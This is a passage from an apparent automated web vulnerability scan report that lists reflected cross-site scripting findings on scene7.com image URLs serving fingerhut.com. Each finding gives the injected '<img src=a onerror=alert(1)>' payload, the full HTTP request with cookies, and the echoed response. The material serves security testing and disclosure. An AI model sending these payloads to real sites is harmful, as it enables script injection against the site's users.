Host: s7d5.scene7.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.fingerhut.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=13935157.693724999.1314797605.1314808828.1314812571.3; __utmz=13935157.1314812571.3.3.utmcsr=crc.scene7.com|utmccn=(referral)|utmcmd=referral|utmcct=/crc/

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Content-Type: text/plain
Content-Length: 94
Expires: Fri, 30 Sep 2011 12:24:33 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Fri, 30 Sep 2011 12:24:33 GMT
Connection: close
X-N: S

Unable to find /bluestembrands/4NV962NBRS055_A_9993a29d<img src=a onerror=alert(1)>a56e65f57ee

3.318. http://s7d5.scene7.com/is/image/bluestembrands/4NX0280000010_WVA_999 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://s7d5.scene7.com
Path:   /is/image/bluestembrands/4NX0280000010_WVA_999

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload ff049<img%20src%3da%20onerror%3dalert(1)>c45d55c3386 was submitted in the REST URL parameter 4. This input was echoed as ff049<img src=a onerror=alert(1)>c45d55c3386 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/bluestembrands/4NX0280000010_WVA_999ff049<img%20src%3da%20onerror%3dalert(1)>c45d55c3386?$Shoppingcart$ HTTP/1.1
Host: s7d5.scene7.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.fingerhut.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=13935157.693724999.1314797605.1314808828.1314812571.3; __utmz=13935157.1314812571.3.3.utmcsr=crc.scene7.com|utmccn=(referral)|utmcmd=referral|utmcct=/crc/

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Content-Type: text/plain
Content-Length: 96
Expires: Fri, 30 Sep 2011 12:24:33 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Fri, 30 Sep 2011 12:24:33 GMT
Connection: close
X-N: S

Unable to find /bluestembrands/4NX0280000010_WVA_999ff049<img src=a onerror=alert(1)>c45d55c3386

3.319. http://s7d5.scene7.com/is/image/bluestembrands/4NZ2960000010_VA_999 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://s7d5.scene7.com
Path:   /is/image/bluestembrands/4NZ2960000010_VA_999

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 691ad<img%20src%3da%20onerror%3dalert(1)>a0b7801804b was submitted in the REST URL parameter 4. This input was echoed as 691ad<img src=a onerror=alert(1)>a0b7801804b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/bluestembrands/4NZ2960000010_VA_999691ad<img%20src%3da%20onerror%3dalert(1)>a0b7801804b?$Shoppingcart$ HTTP/1.1
Host: s7d5.scene7.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.fingerhut.com/product/Belkin-Laptop-Cushtop-Lap-Rest/NT338.uts
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=13935157.693724999.1314797605.1314808828.1314812571.3; __utmz=13935157.1314812571.3.3.utmcsr=crc.scene7.com|utmccn=(referral)|utmcmd=referral|utmcct=/crc/

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Content-Type: text/plain
Content-Length: 95
Expires: Fri, 30 Sep 2011 12:26:24 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Fri, 30 Sep 2011 12:26:24 GMT
Connection: close
X-N: S

Unable to find /bluestembrands/4NZ2960000010_VA_999691ad<img src=a onerror=alert(1)>a0b7801804b

3.320. http://s7d5.scene7.com/is/image/bluestembrands/4NZ3330000010_A_999 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://s7d5.scene7.com
Path:   /is/image/bluestembrands/4NZ3330000010_A_999

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 89349<img%20src%3da%20onerror%3dalert(1)>9970b79041e was submitted in the REST URL parameter 4. This input was echoed as 89349<img src=a onerror=alert(1)>9970b79041e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/bluestembrands/4NZ3330000010_A_99989349<img%20src%3da%20onerror%3dalert(1)>9970b79041e?$Shoppingcart$ HTTP/1.1
Host: s7d5.scene7.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.fingerhut.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=13935157.693724999.1314797605.1314808828.1314812571.3; __utmz=13935157.1314812571.3.3.utmcsr=crc.scene7.com|utmccn=(referral)|utmcmd=referral|utmcct=/crc/

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Content-Type: text/plain
Content-Length: 94
Expires: Fri, 30 Sep 2011 12:24:32 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Fri, 30 Sep 2011 12:24:32 GMT
Connection: close
X-N: S

Unable to find /bluestembrands/4NZ3330000010_A_99989349<img src=a onerror=alert(1)>9970b79041e

3.321. http://s7d5.scene7.com/is/image/bluestembrands/4NZ3340000010_A_999 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://s7d5.scene7.com
Path:   /is/image/bluestembrands/4NZ3340000010_A_999

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 3780a<img%20src%3da%20onerror%3dalert(1)>ccf1da0184c was submitted in the REST URL parameter 4. This input was echoed as 3780a<img src=a onerror=alert(1)>ccf1da0184c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/bluestembrands/4NZ3340000010_A_9993780a<img%20src%3da%20onerror%3dalert(1)>ccf1da0184c?$Shoppingcart$ HTTP/1.1
Host: s7d5.scene7.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.fingerhut.com/product/Belkin-Laptop-Cushtop-Lap-Rest/NT338.uts
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=13935157.693724999.1314797605.1314808828.1314812571.3; __utmz=13935157.1314812571.3.3.utmcsr=crc.scene7.com|utmccn=(referral)|utmcmd=referral|utmcct=/crc/

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Content-Type: text/plain
Content-Length: 94
Expires: Fri, 30 Sep 2011 12:26:24 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Fri, 30 Sep 2011 12:26:24 GMT
Connection: close
X-N: S

Unable to find /bluestembrands/4NZ3340000010_A_9993780a<img src=a onerror=alert(1)>ccf1da0184c

3.322. http://s7d5.scene7.com/is/image/bluestembrands/4NZ4500000010_VA_999 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://s7d5.scene7.com
Path:   /is/image/bluestembrands/4NZ4500000010_VA_999

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload d7ade<img%20src%3da%20onerror%3dalert(1)>4de0d6e3704 was submitted in the REST URL parameter 4. This input was echoed as d7ade<img src=a onerror=alert(1)>4de0d6e3704 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/bluestembrands/4NZ4500000010_VA_999d7ade<img%20src%3da%20onerror%3dalert(1)>4de0d6e3704?$Shoppingcart$ HTTP/1.1
Host: s7d5.scene7.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.fingerhut.com/product/Belkin-Laptop-Cushtop-Lap-Rest/NT338.uts
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=13935157.693724999.1314797605.1314808828.1314812571.3; __utmz=13935157.1314812571.3.3.utmcsr=crc.scene7.com|utmccn=(referral)|utmcmd=referral|utmcct=/crc/

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Content-Type: text/plain
Content-Length: 95
Expires: Fri, 30 Sep 2011 12:26:24 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Fri, 30 Sep 2011 12:26:24 GMT
Connection: close
X-N: S

Unable to find /bluestembrands/4NZ4500000010_VA_999d7ade<img src=a onerror=alert(1)>4de0d6e3704

3.323. http://s7d5.scene7.com/is/image/bluestembrands/4NZ7280000010_VA_999 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://s7d5.scene7.com
Path:   /is/image/bluestembrands/4NZ7280000010_VA_999

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload c69de<img%20src%3da%20onerror%3dalert(1)>5ff80bd38ea was submitted in the REST URL parameter 4. This input was echoed as c69de<img src=a onerror=alert(1)>5ff80bd38ea in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/bluestembrands/4NZ7280000010_VA_999c69de<img%20src%3da%20onerror%3dalert(1)>5ff80bd38ea?$Shoppingcart$ HTTP/1.1
Host: s7d5.scene7.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.fingerhut.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=13935157.693724999.1314797605.1314808828.1314812571.3; __utmz=13935157.1314812571.3.3.utmcsr=crc.scene7.com|utmccn=(referral)|utmcmd=referral|utmcct=/crc/

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Content-Type: text/plain
Content-Length: 95
Expires: Fri, 30 Sep 2011 12:24:32 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Fri, 30 Sep 2011 12:24:32 GMT
Connection: close
X-N: S

Unable to find /bluestembrands/4NZ7280000010_VA_999c69de<img src=a onerror=alert(1)>5ff80bd38ea

3.324. http://s7d5.scene7.com/is/image/bluestembrands/F0661_A_999 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://s7d5.scene7.com
Path:   /is/image/bluestembrands/F0661_A_999

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload ea396<img%20src%3da%20onerror%3dalert(1)>d92755f1b81 was submitted in the REST URL parameter 4. This input was echoed as ea396<img src=a onerror=alert(1)>d92755f1b81 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/bluestembrands/F0661_A_999ea396<img%20src%3da%20onerror%3dalert(1)>d92755f1b81?$Thumbnail$ HTTP/1.1
Host: s7d5.scene7.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.fingerhut.com/thumbnail/Holiday-Big-Book/Holiday-Decor-Outdoor/Mcatp/cat_3960/3965.uts
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=13935157.693724999.1314797605.1314808828.1314812571.3; __utmz=13935157.1314812571.3.3.utmcsr=crc.scene7.com|utmccn=(referral)|utmcmd=referral|utmcct=/crc/

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Content-Type: text/plain
Content-Length: 86
Expires: Fri, 30 Sep 2011 12:26:10 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Fri, 30 Sep 2011 12:26:10 GMT
Connection: close
X-N: S

Unable to find /bluestembrands/F0661_A_999ea396<img src=a onerror=alert(1)>d92755f1b81

3.325. http://s7d5.scene7.com/is/image/bluestembrands/F0670_A_999 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://s7d5.scene7.com
Path:   /is/image/bluestembrands/F0670_A_999

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 5e9f0<img%20src%3da%20onerror%3dalert(1)>14d7556acda was submitted in the REST URL parameter 4. This input was echoed as 5e9f0<img src=a onerror=alert(1)>14d7556acda in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/bluestembrands/F0670_A_9995e9f0<img%20src%3da%20onerror%3dalert(1)>14d7556acda?$Thumbnail$ HTTP/1.1
Host: s7d5.scene7.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.fingerhut.com/thumbnail/Holiday-Big-Book/Holiday-Decor-Outdoor/Mcatp/cat_3960/3965.uts
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=13935157.693724999.1314797605.1314808828.1314812571.3; __utmz=13935157.1314812571.3.3.utmcsr=crc.scene7.com|utmccn=(referral)|utmcmd=referral|utmcct=/crc/

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Content-Type: text/plain
Content-Length: 86
Expires: Fri, 30 Sep 2011 12:26:09 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Fri, 30 Sep 2011 12:26:09 GMT
Connection: close
X-N: S

Unable to find /bluestembrands/F0670_A_9995e9f0<img src=a onerror=alert(1)>14d7556acda

3.326. http://s7d5.scene7.com/is/image/bluestembrands/F0688_A_999 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://s7d5.scene7.com
Path:   /is/image/bluestembrands/F0688_A_999

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload f8436<img%20src%3da%20onerror%3dalert(1)>4a18df611cd was submitted in the REST URL parameter 4. This input was echoed as f8436<img src=a onerror=alert(1)>4a18df611cd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/bluestembrands/F0688_A_999f8436<img%20src%3da%20onerror%3dalert(1)>4a18df611cd?$Thumbnail$ HTTP/1.1
Host: s7d5.scene7.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.fingerhut.com/thumbnail/Holiday-Big-Book/Holiday-Decor-Outdoor/Mcatp/cat_3960/3965.uts
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=13935157.693724999.1314797605.1314808828.1314812571.3; __utmz=13935157.1314812571.3.3.utmcsr=crc.scene7.com|utmccn=(referral)|utmcmd=referral|utmcct=/crc/

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Content-Type: text/plain
Content-Length: 86
Expires: Fri, 30 Sep 2011 12:26:09 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Fri, 30 Sep 2011 12:26:09 GMT
Connection: close
X-N: S

Unable to find /bluestembrands/F0688_A_999f8436<img src=a onerror=alert(1)>4a18df611cd

3.327. http://s7d5.scene7.com/is/image/bluestembrands/F6554_VA_999 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://s7d5.scene7.com
Path:   /is/image/bluestembrands/F6554_VA_999

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload abd28<img%20src%3da%20onerror%3dalert(1)>fb76b048c03 was submitted in the REST URL parameter 4. This input was echoed as abd28<img src=a onerror=alert(1)>fb76b048c03 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/bluestembrands/F6554_VA_999abd28<img%20src%3da%20onerror%3dalert(1)>fb76b048c03?$Shoppingcart$ HTTP/1.1
Host: s7d5.scene7.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.fingerhut.com/product/Belkin-Laptop-Cushtop-Lap-Rest/NT338.uts
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=13935157.693724999.1314797605.1314808828.1314812571.3; __utmz=13935157.1314812571.3.3.utmcsr=crc.scene7.com|utmccn=(referral)|utmcmd=referral|utmcct=/crc/

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Content-Type: text/plain
Content-Length: 87
Expires: Fri, 30 Sep 2011 12:26:25 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Fri, 30 Sep 2011 12:26:25 GMT
Connection: close
X-N: S

Unable to find /bluestembrands/F6554_VA_999abd28<img src=a onerror=alert(1)>fb76b048c03

3.328. http://s7d5.scene7.com/is/image/bluestembrands/K4267_A_999 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://s7d5.scene7.com
Path:   /is/image/bluestembrands/K4267_A_999

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 63613<img%20src%3da%20onerror%3dalert(1)>843b3decd8d was submitted in the REST URL parameter 4. This input was echoed as 63613<img src=a onerror=alert(1)>843b3decd8d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/bluestembrands/K4267_A_99963613<img%20src%3da%20onerror%3dalert(1)>843b3decd8d?$Thumbnail$ HTTP/1.1
Host: s7d5.scene7.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.fingerhut.com/thumbnail/Holiday-Big-Book/Holiday-Decor-Outdoor/Mcatp/cat_3960/3965.uts
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=13935157.693724999.1314797605.1314808828.1314812571.3; __utmz=13935157.1314812571.3.3.utmcsr=crc.scene7.com|utmccn=(referral)|utmcmd=referral|utmcct=/crc/

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Content-Type: text/plain
Content-Length: 86
Expires: Fri, 30 Sep 2011 12:26:11 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Fri, 30 Sep 2011 12:26:11 GMT
Connection: close
X-N: S

Unable to find /bluestembrands/K4267_A_99963613<img src=a onerror=alert(1)>843b3decd8d

3.329. http://s7d5.scene7.com/is/image/bluestembrands/K7544_VA_999 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://s7d5.scene7.com
Path:   /is/image/bluestembrands/K7544_VA_999

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 1e841<img%20src%3da%20onerror%3dalert(1)>53ffb31ba6d was submitted in the REST URL parameter 4. This input was echoed as 1e841<img src=a onerror=alert(1)>53ffb31ba6d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/bluestembrands/K7544_VA_9991e841<img%20src%3da%20onerror%3dalert(1)>53ffb31ba6d?$Shoppingcart$ HTTP/1.1
Host: s7d5.scene7.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.fingerhut.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=13935157.693724999.1314797605.1314808828.1314812571.3; __utmz=13935157.1314812571.3.3.utmcsr=crc.scene7.com|utmccn=(referral)|utmcmd=referral|utmcct=/crc/

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Content-Type: text/plain
Content-Length: 87
Expires: Fri, 30 Sep 2011 12:24:33 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Fri, 30 Sep 2011 12:24:33 GMT
Connection: close
X-N: S

Unable to find /bluestembrands/K7544_VA_9991e841<img src=a onerror=alert(1)>53ffb31ba6d

3.330. http://s7d5.scene7.com/is/image/bluestembrands/K8780_A_999 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://s7d5.scene7.com
Path:   /is/image/bluestembrands/K8780_A_999

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload cda49<img%20src%3da%20onerror%3dalert(1)>24c3235941 was submitted in the REST URL parameter 4. This input was echoed as cda49<img src=a onerror=alert(1)>24c3235941 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/bluestembrands/K8780_A_999cda49<img%20src%3da%20onerror%3dalert(1)>24c3235941?$Shoppingcart$ HTTP/1.1
Host: s7d5.scene7.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.fingerhut.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=13935157.693724999.1314797605.1314808828.1314812571.3; __utmz=13935157.1314812571.3.3.utmcsr=crc.scene7.com|utmccn=(referral)|utmcmd=referral|utmcct=/crc/

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Content-Type: text/plain
Content-Length: 85
Expires: Fri, 30 Sep 2011 12:24:33 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Fri, 30 Sep 2011 12:24:33 GMT
Connection: close
X-N: S

Unable to find /bluestembrands/K8780_A_999cda49<img src=a onerror=alert(1)>24c3235941

3.331. http://s7d5.scene7.com/is/image/bluestembrands/N9063_VWB_400 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://s7d5.scene7.com
Path:   /is/image/bluestembrands/N9063_VWB_400

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 4bd8f<img%20src%3da%20onerror%3dalert(1)>810f9b9d03f was submitted in the REST URL parameter 4. This input was echoed as 4bd8f<img src=a onerror=alert(1)>810f9b9d03f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/bluestembrands/N9063_VWB_4004bd8f<img%20src%3da%20onerror%3dalert(1)>810f9b9d03f?$Thumbnail$ HTTP/1.1
Host: s7d5.scene7.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.fingerhut.com/thumbnail/Holiday-Big-Book/Holiday-Decor-Outdoor/Mcatp/cat_3960/3965.uts
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=13935157.693724999.1314797605.1314808828.1314812571.3; __utmz=13935157.1314812571.3.3.utmcsr=crc.scene7.com|utmccn=(referral)|utmcmd=referral|utmcct=/crc/

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Content-Type: text/plain
Content-Length: 88
Expires: Fri, 30 Sep 2011 12:26:10 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Fri, 30 Sep 2011 12:26:10 GMT
Connection: close
X-N: S

Unable to find /bluestembrands/N9063_VWB_4004bd8f<img src=a onerror=alert(1)>810f9b9d03f

3.332. http://s7d5.scene7.com/is/image/bluestembrands/ND821_VA_999 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://s7d5.scene7.com
Path:   /is/image/bluestembrands/ND821_VA_999

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 8a031<img%20src%3da%20onerror%3dalert(1)>790edd74f1f was submitted in the REST URL parameter 4. This input was echoed as 8a031<img src=a onerror=alert(1)>790edd74f1f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/bluestembrands/ND821_VA_9998a031<img%20src%3da%20onerror%3dalert(1)>790edd74f1f?$ShoppingCart$ HTTP/1.1
Host: s7d5.scene7.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.fingerhut.com/product/Belkin-Laptop-Cushtop-Lap-Rest/NT338.uts
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=13935157.693724999.1314797605.1314808828.1314812571.3; __utmz=13935157.1314812571.3.3.utmcsr=crc.scene7.com|utmccn=(referral)|utmcmd=referral|utmcct=/crc/

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Content-Type: text/plain
Content-Length: 87
Expires: Fri, 30 Sep 2011 12:26:25 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Fri, 30 Sep 2011 12:26:25 GMT
Connection: close
X-N: S

Unable to find /bluestembrands/ND821_VA_9998a031<img src=a onerror=alert(1)>790edd74f1f

3.333. http://s7d5.scene7.com/is/image/bluestembrands/NE304_A_999 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://s7d5.scene7.com
Path:   /is/image/bluestembrands/NE304_A_999

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload b5e77<img%20src%3da%20onerror%3dalert(1)>a9dc4d3a216 was submitted in the REST URL parameter 4. This input was echoed as b5e77<img src=a onerror=alert(1)>a9dc4d3a216 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/bluestembrands/NE304_A_999b5e77<img%20src%3da%20onerror%3dalert(1)>a9dc4d3a216?$Thumbnail$ HTTP/1.1
Host: s7d5.scene7.com
Proxy-Connection: keep-alive
